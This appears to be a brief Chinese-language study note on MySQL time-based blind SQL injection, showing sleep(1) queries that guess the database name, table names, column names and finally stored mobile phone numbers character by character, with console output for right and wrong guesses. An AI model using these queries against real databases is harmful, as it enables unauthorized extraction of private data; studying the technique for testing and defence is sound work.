mysql基于时间的盲注======================================================================================================================================================================*	猜解库名	-	下面是猜解正确	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x66);                                                                             		+----------+		| sleep(1) |		+----------+		|        0 |		+----------+		1 row in set (1.00 sec)	-	下面是猜解错误	mysql> select sleep(1) from (select database() a_database)a where substr(a_database,1,1)=char(0x67);		Empty set (0.00 sec)*	猜解表名	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1)a  where substr(a_tn, 1, 1)=‘f‘;			+----------+			| sleep(1) |			+----------+			|        0 |			+----------+			1 row in set (1.00 sec)	-	mysql> select sleep(1) from (select distinct table_name as a_tn from information_schema.tables where table_schema=‘fangjiangjun‘ limit 0,1)a  where substr(a_tn, 1, 1)=‘x‘;			Empty set (0.00 sec)*	猜解字段名	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1)a  where substr(a_cn, 1, 1)=‘i‘;			+----------+			| sleep(1) |			+----------+			|        0 |			+----------+			1 row in set (1.01 sec)	-	mysql> select sleep(1) from (select distinct column_name as a_cn from information_schema.columns where table_schema=‘fangjiangjun‘ and table_name=‘f_user‘ limit 0,1)a  where substr(a_cn, 2, 1)=‘d‘;			+----------+			| sleep(1) |			+----------+			|        0 |			+----------+			1 row in set (1.00 sec)*	猜解字段值	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,1,1)=‘1‘;			+----------+			| sleep(1) |			+----------+			|        0 |			+----------+			1 row in set (1.00 sec)	-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)=‘3‘;				-	mysql> select sleep(1) from (select convert(mobile_phone,char) as a_mp from fangjiangjun.f_user order by id limit 0,1)a where substr(a_mp,2,1)=‘8‘;			+----------+			| sleep(1) |			+----------+			|        0 |			+----------+			1 row in set (1.00 sec)